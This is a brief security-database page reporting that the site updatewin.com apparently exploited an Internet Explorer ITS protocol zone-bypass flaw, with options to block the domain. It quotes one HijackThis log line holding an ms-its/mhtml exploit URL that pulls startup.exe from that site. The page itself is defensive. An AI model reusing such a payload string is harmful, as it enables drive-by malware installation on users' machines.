Skip to content

updatewin.com

submitted by Fred de Vries

updatewin.com seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log entry:

O16 - DPF: {11010101-1001-1111-1000-115676576811} - ms-its:mhtml:file://c:\nosuch.mht!http://updatewin.com/buy/var.chm::/startup.exe

Koffix offers you the possibility to:

  1. add updatewin.com to the restricted zone
  2. add updatewin.com to the HOSTS file

The information about updatewin.com is licensed under Creative Commons Attribution 2.5 License.

Comments

No comments posted yet.

Leave a reply